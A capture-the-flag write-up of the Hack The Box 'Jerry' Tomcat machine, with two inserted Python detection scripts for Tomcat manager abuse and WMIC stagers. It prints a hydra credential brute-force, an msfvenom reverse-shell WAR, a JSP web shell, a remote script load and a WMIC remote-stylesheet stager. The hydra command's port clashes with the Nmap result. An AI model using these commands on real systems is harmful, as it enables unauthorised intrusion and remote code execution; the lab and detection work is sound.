HTB Write-Up Jerry Windows

Nmap:

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1

Cannot log in to the Tomcat host manager page.

Look for a Tomcat wordlist.

Use hydra.

hydra -C lets you use colon-separated user:pass text files.

hydra -C /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://10.129.161.193:8000/manager/html

The admin entry was a false positive.

Got in.

The manager page allows you to upload a WAR file (a Java web archive, which can contain JSP pages).

Generate a payload with msfvenom:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.131 LPORT=5555 -f war > shell.war

We are already root!
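Detection-side counterpart to the manager steps above, added here as an example (it is not part of the write-up and not Tomcat's own tooling). It parses Tomcat access-log lines in the default "common" pattern and flags three things: a burst of 401s against /manager/ from one client, a 200 on /manager/ from that same client afterwards, and any POST/PUT to the manager upload or deploy endpoints. The log lines, timestamps, and the 5-failures-in-60-seconds threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<bytes>\S+)$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Manager endpoints that deploy new applications (HTML form upload and text API)
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")

# Constructed sample log (not from the target): a credential-guessing burst against
# /manager/html, one success, a WAR upload, a hit on the dropped JSP, and benign noise.
SAMPLE_LOG = """\
10.10.14.131 - - [05/Mar/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.131 - - [05/Mar/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.131 - - [05/Mar/2024:10:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.131 - - [05/Mar/2024:10:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.131 - - [05/Mar/2024:10:00:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.131 - tomcat [05/Mar/2024:10:00:03 +0000] "GET /manager/html HTTP/1.1" 200 15831
10.10.14.131 - tomcat [05/Mar/2024:10:01:10 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 302 -
10.10.14.131 - - [05/Mar/2024:10:01:15 +0000] "GET /cmd/cmd.jsp?cmd=whoami HTTP/1.1" 200 512
192.0.2.7 - - [05/Mar/2024:10:02:00 +0000] "GET /docs/ HTTP/1.1" 200 7321
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def analyze(log_text, fail_threshold=5, window_seconds=60):
    """Return a list of alerts, in log order, for manager-abuse patterns."""
    alerts = []
    failures = defaultdict(list)   # client -> timestamps of recent 401s on /manager/
    burst_clients = set()          # clients already flagged for a guessing burst
    success_clients = set()        # burst clients already flagged for a later success
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith("/manager/"):
            continue
        host, ts, status = rec["host"], rec["ts"], rec["status"]
        path = rec["path"].split("?", 1)[0]   # drop the query string (CSRF nonce etc.)
        if rec["method"] in ("POST", "PUT") and path.startswith(DEPLOY_PATHS):
            alerts.append({"kind": "manager_war_deploy", "host": host,
                           "detail": f"{rec['method']} {path} as user {rec['user']}"})
        elif status == 401:
            # sliding window: keep only failures that are still within window_seconds
            recent = [t for t in failures[host] if (ts - t).total_seconds() <= window_seconds]
            recent.append(ts)
            failures[host] = recent
            if len(recent) >= fail_threshold and host not in burst_clients:
                burst_clients.add(host)
                alerts.append({"kind": "manager_auth_burst", "host": host,
                               "detail": f"{len(recent)} failures within {window_seconds}s"})
        elif status == 200 and host in burst_clients and host not in success_clients:
            success_clients.add(host)
            alerts.append({"kind": "manager_auth_success_after_burst", "host": host,
                           "detail": f"authenticated as {rec['user']}"})
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        print(f"[{a['kind']}] {a['host']}: {a['detail']}")
```

On the sample log this yields, in order, the burst alert, the success-after-burst alert and the deploy alert, all for 10.10.14.131; the /cmd/cmd.jsp request is outside /manager/ and is left to a separate web-shell rule. The deploy rule is the one worth keeping even without any brute-force, since legitimate deployments through the manager should be rare and attributable to a known user.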

----

Manual JSP shell - Silent Trinity - python

Get a JSP shell:

Follow the instructions for the host method:

<script src="http://10.10.14.131/a.js"></script>

Additional tip: remove the WAR file that came with the package and make your own with:

zip cmd.war cmd.jsp

This packs cmd.jsp into the cmd.war archive.

Finally, host the file over HTTP.

Go to the manager/html page and deploy the cmd.war file.

Now when you browse to /cmd/cmd.jsp, we get a shell!!!

Execute commands with the syntax cmd /c COMMAND.

Silent Trinity:

Downloaded here.

Go to the server directory and start st.py.

Run "listeners" to switch to listener mode and "list" what we have.

"use http" and set the BindIP.

Then start the listener!

Once it is running: stagers > list > use wmic > generate http.

Plug this value into our JSP shell:

C:\Windows\System32\wbem\WMIC.exe os get /format:"https://myurl/wmic.xsl"

Create a new www directory and move the wmic.xsl there.

Since the Tomcat shell requires the a.js file, copy that over to the directory as well.
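Detection-side counterpart to the WMIC stager step above, added here as an example (not from the write-up and not part of Silent Trinity). It classifies process-creation events shaped like Sysmon Event ID 1 fields and flags two things that this chain produces on the host: WMIC launched with a /format: switch that points at a remote stylesheet, and a command interpreter whose parent is the Tomcat/Java service process. The events, paths, process ids and the URL are constructed assumptions.

```python
import re
from pathlib import PureWindowsPath

# A /format: switch whose value is a remote stylesheet (quotes optional, any case)
REMOTE_FORMAT_RE = re.compile(r'/format:\s*"?\s*https?://', re.IGNORECASE)

# Web-server processes that have no business spawning a command interpreter
WEB_PARENTS = {"tomcat7.exe", "tomcat8.exe", "tomcat9.exe", "java.exe", "javaw.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed process-creation events (not real telemetry); field names follow Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Apache Software Foundation\Tomcat 7.0\bin\tomcat7.exe",
     "CommandLine": "cmd /c whoami"},
    {"ProcessId": 4188, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'WMIC.exe os get /format:"https://listener.invalid/wmic.xsl"'},
    {"ProcessId": 5002, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "wmic os get Caption,Version"},
    {"ProcessId": 5310, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe"},
]


def image_name(path):
    """Lower-case file name of a Windows image path."""
    return PureWindowsPath(path).name.lower()


def classify(event):
    """Return the list of reasons an event is suspicious (empty if none)."""
    reasons = []
    image = image_name(event.get("Image", ""))
    parent = image_name(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    if image == "wmic.exe" and REMOTE_FORMAT_RE.search(cmdline):
        reasons.append("wmic /format with remote stylesheet")
    if parent in WEB_PARENTS and image in SHELLS:
        reasons.append(f"{image} spawned by web server process {parent}")
    return reasons


def scan(events):
    """Map ProcessId -> reasons for every event that trips at least one rule."""
    flagged = {}
    for ev in events:
        reasons = classify(ev)
        if reasons:
            flagged[ev["ProcessId"]] = reasons
    return flagged


if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS).items():
        print(pid, "; ".join(reasons))
```

The parent-child rule is the more durable of the two: the stager can change its command line, but a shell spawned by the servlet container is the signature of a deployed web shell regardless of what runs next. The local `wmic os get` from svchost and the interactive cmd.exe from explorer are left unflagged, which is what keeps the rule usable on a busy host.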

Hmm, didn't work. I'll come back to this.
